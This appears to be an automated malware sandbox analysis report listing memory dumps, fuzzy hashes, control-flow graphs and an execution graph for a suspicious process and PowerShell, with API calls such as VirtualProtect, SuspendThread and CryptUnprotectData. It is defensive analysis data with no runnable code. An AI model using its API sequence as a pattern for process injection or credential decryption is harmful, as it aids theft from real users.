                                                                                                                    • Source File: 00000004.00000002.1807595096.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9b780000_chainportruntimeCrtMonitor.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 876373be268df853593692b5fdafab42d0378986fcc82d95864c9021db9c69ff
                                                                                                                    • Instruction ID: 275d21d6c773d9857dd1bd53e64f650d7eedb0a9a04eea6ce5040b55df992a42
                                                                                                                    • Opcode Fuzzy Hash: 876373be268df853593692b5fdafab42d0378986fcc82d95864c9021db9c69ff
                                                                                                                    • Instruction Fuzzy Hash: 38A1A2B5A19E4D8FEB98DF68C8657A97FE1FF55311F0002BAD04AD32E6CE7818018750

                                                                                                                    Control-flow Graph

                                                                                                                     • Nodes: 265 7ffd9b93cd6d-7ffd9b93ce08; 268 7ffd9b93ce0d-7ffd9b93ce45 (call 7ffd9b93ce46)
                                                                                                                     • Edges: 265->268
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.1810776950.00007FFD9B930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B930000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9b930000_chainportruntimeCrtMonitor.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 49a658226095411a4e2cfc852aab4f26568ea5e2a3658fcefd2ce135802abae9
                                                                                                                    • Instruction ID: d3e5f97090f1693832cb546a2277a442efb97dd16b7dac051528f863ec8a3c04
                                                                                                                    • Opcode Fuzzy Hash: 49a658226095411a4e2cfc852aab4f26568ea5e2a3658fcefd2ce135802abae9
                                                                                                                    • Instruction Fuzzy Hash: C831F470E18A1D8FCF94DF98D491AEDBBF1FB69300F2011AAD019E3291CA35A941CB44

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.1810776950.00007FFD9B930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B930000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9b930000_chainportruntimeCrtMonitor.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ResumeThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 947044025-0
                                                                                                                    • Opcode ID: d8b4cd556bafcd8b8014a2c9cf24a2230fa7ed3f1c4fa6136ed31d2ed71c2be3
                                                                                                                    • Instruction ID: e48b75a810cad9d39b3c763df9f4bef7b2fcddf86e84aaf9a64b9c552ae663c9
                                                                                                                    • Opcode Fuzzy Hash: d8b4cd556bafcd8b8014a2c9cf24a2230fa7ed3f1c4fa6136ed31d2ed71c2be3
                                                                                                                    • Instruction Fuzzy Hash: 22517D3090D79C8FDB56DFA8C865AE9BFF0EF16310F1441ABD049DB2A2DA359846CB11

                                                                                                                    Control-flow Graph

                                                                                                                     • Nodes: 12 7ffd9b93e7fd-7ffd9b93e809; 13 7ffd9b93e814-7ffd9b93e8e2 (SuspendThread); 14 7ffd9b93e80b-7ffd9b93e813; 17 7ffd9b93e8e4; 18 7ffd9b93e8ea-7ffd9b93e934
                                                                                                                     • Edges: 12->13, 12->14, 13->17, 13->18, 14->13, 17->18
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.1810776950.00007FFD9B930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B930000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9b930000_chainportruntimeCrtMonitor.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: SuspendThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3178671153-0
                                                                                                                    • Opcode ID: 8c1a30217de86386a4361e82f0555a4ba0297ae54a71565354353175ccc52c06
                                                                                                                    • Instruction ID: 744c7afa4209507a184df4cb0544d0ba4d2585f49e86659d2fac44981b7f6b6e
                                                                                                                    • Opcode Fuzzy Hash: 8c1a30217de86386a4361e82f0555a4ba0297ae54a71565354353175ccc52c06
                                                                                                                    • Instruction Fuzzy Hash: BC413C70E0864C8FDB98DFA8C895AEDBBF0FF5A310F10416AD04DE7292DA74A845CB41

                                                                                                                    Control-flow Graph

                                                                                                                     • Nodes: 21 7ffd9b941e85-7ffd9b941f63 (GetFileAttributesW); 24 7ffd9b941f65; 25 7ffd9b941f6b-7ffd9b941fa9
                                                                                                                     • Edges: 21->24, 21->25, 24->25
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.1810776950.00007FFD9B930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B930000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9b930000_chainportruntimeCrtMonitor.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AttributesFile
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3188754299-0
                                                                                                                    • Opcode ID: 32c181e51e8fcd5e2cccec107de39075f495399c96fb0fd725e5e10e84283732
                                                                                                                    • Instruction ID: 0bb66de4614c0c6de665e0e0497a669237762d4a137e78935dac070dec4c094b
                                                                                                                    • Opcode Fuzzy Hash: 32c181e51e8fcd5e2cccec107de39075f495399c96fb0fd725e5e10e84283732
                                                                                                                    • Instruction Fuzzy Hash: D941F870E08A1C8FDB98DF98D895BEDBBF1EB59310F10416ED049E7252DA71A846CB44

                                                                                                                    Control-flow Graph

                                                                                                                     • Nodes: 27 7ffd9b940169-7ffd9b940175; 28 7ffd9b940180-7ffd9b940252 (CloseHandle); 29 7ffd9b940177-7ffd9b94017f; 32 7ffd9b940254; 33 7ffd9b94025a-7ffd9b9402ae
                                                                                                                     • Edges: 27->28, 27->29, 28->32, 28->33, 29->28, 32->33
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.1810776950.00007FFD9B930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B930000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9b930000_chainportruntimeCrtMonitor.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseHandle
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2962429428-0
                                                                                                                    • Opcode ID: d076c66944567024b2d2846ac2a5465b37adf4e04182d0cf7e0a243c6fa99b35
                                                                                                                    • Instruction ID: 58b8bef947dcb42319759f4f69d6e2050b5f14eefce13ebf0a88e385d3b821be
                                                                                                                    • Opcode Fuzzy Hash: d076c66944567024b2d2846ac2a5465b37adf4e04182d0cf7e0a243c6fa99b35
                                                                                                                    • Instruction Fuzzy Hash: 9C416D70D0865C8FDB59DFA8C895BEDBBF0EF5A310F1041AAD049E7292DA74A985CB01

                                                                                                                    Control-flow Graph

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.1807595096.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9b780000_chainportruntimeCrtMonitor.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: o
                                                                                                                    • API String ID: 0-252678980
                                                                                                                    • Opcode ID: 90cee2a992bd17d2e0e5db91dcac079dbb4acfd98325e5ca14da9a4c776ca307
                                                                                                                    • Instruction ID: a7f0e95323526d31ad360258a051c06b28c9c470e6ff790270b7c6ac8c8c0c54
                                                                                                                    • Opcode Fuzzy Hash: 90cee2a992bd17d2e0e5db91dcac079dbb4acfd98325e5ca14da9a4c776ca307
                                                                                                                    • Instruction Fuzzy Hash: AC113070E0655E8FDB78DB04C8946EC73B2EB54315F0042FAD51DA62A5CA741E858F44

                                                                                                                    Control-flow Graph

                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.1807595096.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9b780000_chainportruntimeCrtMonitor.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 18368e65d9ce2385699acaa4cd725fbf74d0dd87a124965ab946ba64c67bbdd3
                                                                                                                    • Instruction ID: bc8d760767dc939a4e9f8c0a2230078ec2a92dd2e51aef7f29c4d7d3dd3925fb
                                                                                                                    • Opcode Fuzzy Hash: 18368e65d9ce2385699acaa4cd725fbf74d0dd87a124965ab946ba64c67bbdd3
                                                                                                                    • Instruction Fuzzy Hash: 96519236E0865D8FDB54EFA8D4A5AFD7BA1EF58315F0401BAE409D7196CF34A841CB80

                                                                                                                    Control-flow Graph

                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.1807595096.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9b780000_chainportruntimeCrtMonitor.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 746e2053d1799b694b4f9a2e986850d251dc10baf071ed0befbcb8e6d2f1d09d
                                                                                                                    • Instruction ID: 2aaf177a4b5795f2dd269031a389ee256d2256183874c23f487a5a16e632f9a8
                                                                                                                    • Opcode Fuzzy Hash: 746e2053d1799b694b4f9a2e986850d251dc10baf071ed0befbcb8e6d2f1d09d
                                                                                                                    • Instruction Fuzzy Hash: 55412F31E18A1D9FDB58EF98D4A5AED77A1FF58315F10017AE41DD3296CE34A8418B80

                                                                                                                    Control-flow Graph

                                                                                                                    • Legend: Executed / Not Executed
                                                                                                                    • Basic blocks (node: address range): 164 7ffd9b780908-7ffd9b798934; 166 7ffd9b798936; 167 7ffd9b79893b-7ffd9b798941; 168 7ffd9b798a15-7ffd9b798a1b; 169 7ffd9b798946-7ffd9b79897c; 170 7ffd9b798a21-7ffd9b798a2a; 172 7ffd9b798982-7ffd9b7989ef; 177 7ffd9b798a0d-7ffd9b798a12; 178 7ffd9b7989f1-7ffd9b7989fa; 179 7ffd9b7989fc-7ffd9b798a0c
                                                                                                                    • Edges: 164->166, 164->167, 166->167, 167->168, 168->169, 168->170, 169->172, 172->177, 172->178, 177->168, 178->177, 178->179 (the edge 177->168 closes a loop over blocks 168, 169, 172 and 177)
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.1807595096.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9b780000_chainportruntimeCrtMonitor.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 48c2f8af60c22ce31e49249731661e5c6b91890fe3a3cb2f1ae313f8fd0dc834
                                                                                                                    • Instruction ID: 7f57a3efb7376bf9e2f2151377593fe5a150b3e3c3320bccbe9eaa76b643324b
                                                                                                                    • Opcode Fuzzy Hash: 48c2f8af60c22ce31e49249731661e5c6b91890fe3a3cb2f1ae313f8fd0dc834
                                                                                                                    • Instruction Fuzzy Hash: FB518D30A08A0E9FCF84EF98D494EED7BF1FF58355B150269E419E7260DA34E990CB90

                                                                                                                    Control-flow Graph

                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.1807595096.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9b780000_chainportruntimeCrtMonitor.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3f28440f31e260881bf4961ad55a51fdf236c3aacce4a81056d1dd40ea63ce2e
                                                                                                                    • Instruction ID: b84c0ed93872ce5bc327513c00b20d2422e2655610e8c1487a5e4a22be75715a
                                                                                                                    • Opcode Fuzzy Hash: 3f28440f31e260881bf4961ad55a51fdf236c3aacce4a81056d1dd40ea63ce2e
                                                                                                                    • Instruction Fuzzy Hash: C1410B70E14A5D8FDF94EF98C8A5AEDBBF1FF58301F000179D409E32A5DA34A8518B81
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.1807595096.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9b780000_chainportruntimeCrtMonitor.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 8115b1173c6ab62e8d1ff29a05cc94d8579ddd2af400d3ec629ef44863109b7d
                                                                                                                    • Instruction ID: 568d492dd80c7d294d07f610014a6bdcb5011b54c29289399d3d9fc71dd83fe3
                                                                                                                    • Opcode Fuzzy Hash: 8115b1173c6ab62e8d1ff29a05cc94d8579ddd2af400d3ec629ef44863109b7d
                                                                                                                    • Instruction Fuzzy Hash: 8041A870E1AA1D9EEBA4EB58C8A8AE877F1FF58342F5101F5D00DD21B1DA346A818F11
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.1807595096.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9b780000_chainportruntimeCrtMonitor.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 30eb2d1c12ad64e2d65cebd8979de9b5d1494723305821639a2fe2de2262220a
                                                                                                                    • Instruction ID: 09246ecee0a7598147bfbca8ffc96fa2014257d3eeb0bd742b78d09a12c78753
                                                                                                                    • Opcode Fuzzy Hash: 30eb2d1c12ad64e2d65cebd8979de9b5d1494723305821639a2fe2de2262220a
                                                                                                                    • Instruction Fuzzy Hash: D2318B75A04A1C8FDFA4DF18C895AE9B7F1FBA5305F1001EAD00EE3664CA759A85CF42
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.1807595096.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9b780000_chainportruntimeCrtMonitor.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3fe328cd397377b5fb7f3747c0b2df0f243e6d12bf30f8310357fd1156ff0cea
                                                                                                                    • Instruction ID: 37c09cd9a84d90e8750213c2b34d3f3968a54414793440b509fb98b9fc5ac148
                                                                                                                    • Opcode Fuzzy Hash: 3fe328cd397377b5fb7f3747c0b2df0f243e6d12bf30f8310357fd1156ff0cea
                                                                                                                    • Instruction Fuzzy Hash: 3D21FB36B0EB8D4FE7229AA8DC611ED7B60EB52312F0646B3C055871F2DA3816098B91
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.1807595096.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9b780000_chainportruntimeCrtMonitor.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e2204bdf68d1f7384ae44dacd6503cc98062c89588c33a641936370f4cddfa1d
                                                                                                                    • Instruction ID: 4f7ee495eb8cccf5d908da68d99fdb874235554a8abb585acc104ab75adb5f02
                                                                                                                    • Opcode Fuzzy Hash: e2204bdf68d1f7384ae44dacd6503cc98062c89588c33a641936370f4cddfa1d
                                                                                                                    • Instruction Fuzzy Hash: FF110836B0EB8D4EE7229A64C8602F97B70EB52312F0646B3C051DB1F2DA3816098B91
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.1807595096.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9b780000_chainportruntimeCrtMonitor.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 8bb6890d351fb4fd3fab5fbc18bbbccb6257e9154700f61ee6b45bb46f90c04d
                                                                                                                    • Instruction ID: 828950c5210494d0a64d676bb40e8d117aa741ba454c0ba4b9645fae842be331
                                                                                                                    • Opcode Fuzzy Hash: 8bb6890d351fb4fd3fab5fbc18bbbccb6257e9154700f61ee6b45bb46f90c04d
                                                                                                                    • Instruction Fuzzy Hash: FE115A3162964DCFCF44EF68C8919EA7BA0FF58308F0502AAE84CD7261D730A565CB81
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.1807595096.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9b780000_chainportruntimeCrtMonitor.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 71df5d0c68ff264453091a1595940b7fe1c19db0acde8cda0e25faa45938d5f2
                                                                                                                    • Instruction ID: 8adad751ecd81bc83cbd65cba9db5a560f061c48e548013c32d5d80cde737d16
                                                                                                                    • Opcode Fuzzy Hash: 71df5d0c68ff264453091a1595940b7fe1c19db0acde8cda0e25faa45938d5f2
                                                                                                                    • Instruction Fuzzy Hash: 8A11A336A0EB8D4EE7229A64C8642E97B70EB52311F0646B7C051DB1F2DA3826198B91
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.1807595096.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9b780000_chainportruntimeCrtMonitor.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 2600486e41b478e4d3ac856f20ac60c118cee82a6a6d78625d13b0bf97719440
                                                                                                                    • Instruction ID: d3fe040652a33b0af4d1c71e40bd5bbd351b4d3d229b7e07d732a52f0dafc84d
                                                                                                                    • Opcode Fuzzy Hash: 2600486e41b478e4d3ac856f20ac60c118cee82a6a6d78625d13b0bf97719440
                                                                                                                    • Instruction Fuzzy Hash: C701C435A0EBCE4EE7229BA488642E97B70EB42301F0546B7C051DB1F2DA381618C741
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.1807595096.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9b780000_chainportruntimeCrtMonitor.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1c779053186b7fbc8916a3e4734f191fec70342498dce9c73aa1e9b55789a7eb
                                                                                                                    • Instruction ID: c9025f080db040153fa031505262164587e336e29dbb95df6499e6361add445c
                                                                                                                    • Opcode Fuzzy Hash: 1c779053186b7fbc8916a3e4734f191fec70342498dce9c73aa1e9b55789a7eb
                                                                                                                    • Instruction Fuzzy Hash: 89F03030A06A4E9FEB94EF98D4596EE77A1FF54315F110576E81CD21B0DA3466A08B80
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.1807595096.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9b780000_chainportruntimeCrtMonitor.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c2ca80e5f4c8be68eae1745b18e39a781460b072909acbd9e4ee04ddba328236
                                                                                                                    • Instruction ID: 9b58ef5e16669c98320971820618c7cae1e3e7fa055fe4fd4525ea4a9f37a708
                                                                                                                    • Opcode Fuzzy Hash: c2ca80e5f4c8be68eae1745b18e39a781460b072909acbd9e4ee04ddba328236
                                                                                                                    • Instruction Fuzzy Hash: 7DF0BD70914A4D9FDF94EF58D848EAA7BE0FF28305F1105A5F818D3264D630E690CB80
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.1807595096.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9b780000_chainportruntimeCrtMonitor.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e76ba0d66619528eac172e349778580941f0ac78a2fe24bca682e99e05c37370
                                                                                                                    • Instruction ID: a26e0fa2e7f083899c9fc8aea1a99cf83b6bd399a03821170910e81b77ae18e1
                                                                                                                    • Opcode Fuzzy Hash: e76ba0d66619528eac172e349778580941f0ac78a2fe24bca682e99e05c37370
                                                                                                                    • Instruction Fuzzy Hash: 2AF01230915A4E9FEB94EFA4D4496EA77F1FF14305F110566E81CD2164DA30A6A0CB80
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.1807595096.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9b780000_chainportruntimeCrtMonitor.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 176f32b092650aaa9c03085f6199232841bd254698e5009ef9b55d3b40f0cc9c
                                                                                                                    • Instruction ID: 37447d83580b0fcc2606e5f62ddbbd85c5b339ac5e95646f174f54843328d7c9
                                                                                                                    • Opcode Fuzzy Hash: 176f32b092650aaa9c03085f6199232841bd254698e5009ef9b55d3b40f0cc9c
                                                                                                                    • Instruction Fuzzy Hash: 08F06B70E4AA1D8EEBB4DA54DC997E9B3B1EF54312F1151EAC10DA22A1DE741A808F01
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.1810776950.00007FFD9B930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B930000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9b930000_chainportruntimeCrtMonitor.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 55d6afa9a189d55372fd5d21add54cb921472bfee75c8fe32ae1327c789bda17
                                                                                                                    • Instruction ID: cca5c797763ab3c4487b54ac030bde4f8fde18c548e5a013c2b6ac9a5c22ed86
                                                                                                                    • Opcode Fuzzy Hash: 55d6afa9a189d55372fd5d21add54cb921472bfee75c8fe32ae1327c789bda17
                                                                                                                    • Instruction Fuzzy Hash: 0141C337A0F7F22ED3178A7998A14E53F21EF4326431D47B7C0948F0A3DE19654B86A0
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.1807595096.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9b780000_chainportruntimeCrtMonitor.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: c9$!k9$"s9$#{9
                                                                                                                    • API String ID: 0-1692736845
Memory Dump Source
• Source File: 00000008.00000002.1902089672.00007FFD9B850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B850000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffd9b850000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000008.00000002.1901405271.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffd9b780000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000008.00000002.1901405271.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffd9b780000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000008.00000002.1900387435.00007FFD9B66D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B66D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffd9b66d000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000008.00000002.1901405271.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffd9b780000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000008.00000002.1901405271.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffd9b780000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000008.00000002.1902089672.00007FFD9B850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B850000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffd9b850000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000008.00000002.1902089672.00007FFD9B850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B850000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffd9b850000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000008.00000002.1902089672.00007FFD9B850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B850000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffd9b850000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Strings
Memory Dump Source
• Source File: 00000008.00000002.1901405271.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffd9b780000_powershell.jbxd
Similarity
• API ID:
• String ID: L_^$L_^$L_^$L_^$L_^
• API String ID: 0-2264858084

Execution Graph

Execution Coverage: 5.5%
Dynamic/Decrypted Code Coverage: 45.5%
Signature Coverage: 18.2%
Total number of Nodes: 22
Total number of Limit Nodes: 0
execution_graph (one node chain per line; the API called at a node is named after its address):
• 7ffd9b93e7fd -> 7ffd9b93e80b SuspendThread -> 7ffd9b93e8e4
• 7ffd9b940008 -> 7ffd9b94000a ResumeThread -> 7ffd9b940114
• 7ffd9b79372d -> 7ffd9b79374f VirtualAlloc -> 7ffd9b793865
• 7ffd9b791d3e -> 7ffd9b791d4d VirtualProtect -> 7ffd9b791e8d
• 7ffd9b941e85 -> 7ffd9b941ed2 GetFileAttributesW -> 7ffd9b941f65
• 7ffd9bd011ce -> 7ffd9bd011ea -> 7ffd9bd012f1 CryptUnprotectData -> 7ffd9bd013ff
• 7ffd9b940169 -> 7ffd9b940177 CloseHandle -> 7ffd9b940254
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2951114625.00007FFD9B79B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B79B000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_7ffd9b79b000_kahKUDRlEYHfKIalWlM.jbxd
Similarity
• API ID:
• String ID: ]K_H$hV_H
• API String ID: 0-3233018232

Control-flow Graph

• Executed
